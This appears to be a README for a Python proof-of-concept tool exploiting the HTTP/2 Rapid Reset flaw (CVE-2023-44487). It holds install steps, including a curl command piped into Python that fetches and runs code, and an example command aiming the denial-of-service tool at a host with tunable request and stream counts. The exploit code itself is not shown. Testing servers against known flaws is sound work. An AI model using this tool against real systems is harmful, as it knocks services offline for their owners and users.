A python based exploit to test out rapid reset attack (CVE-2023-44487)# HTTP2 Rapid Reset Attack: CVE-2023-44487
Quick exploit to test out rapid reset attack (CVE-2023-44487). Note: For education purpose only
# Exploit:
Quick exploit to test out rapid reset attack (CVE-2023-44487). Note: For education purpose only
## Table of Contents
- [Installation](#installation)
- [Usage](#usage)
## Installation
Clone the repository to your local machine using Git, install poetry, and run the program:
```bash
git clone https://github.com/studiogangster/CVE-2023-44487.git
cd CVE-2023-44487
# install Poetry, if you haven't already:
curl -sSL https://install.python-poetry.org | python -
# poetry install
poetry install
# Activate the virtual environment created by Poetry:
poetry shell
# Run Help
python main.py
## Example:
python main.py --host example.com --path /api --headers "Authorization: Basic dummy-token ; Custom-Header:Custom-Header-Value" --port 443 --requests_count 100 --max_streams 20 --parallel_connections 2
```
## Usage
Usage: main.py [OPTIONS]
```bash
Options:
--host TEXT Host URL [required]
--path TEXT Path on the host [required]
--headers TEXT Headers (comma-separated) [required]
--port INTEGER Port number [required]
--requests_count INTEGER Number of requests to be sent [required]
--max_streams INTEGER Maximum streams to be opened in parallel
[required]
--parallel_connections INTEGER Number of parallel connections to be made
with the server. (TCP connection)
[required]
--help Show this message and exit.
```
[4.0K] /data/pocs/41804f685791039b5c9ff5b34dd135bf42c365c5
├── [ 11K] LICENSE
├── [8.6K] main.py
├── [ 35K] poetry.lock
├── [ 393] pyproject.toml
└── [1.7K] README.md
0 directories, 5 files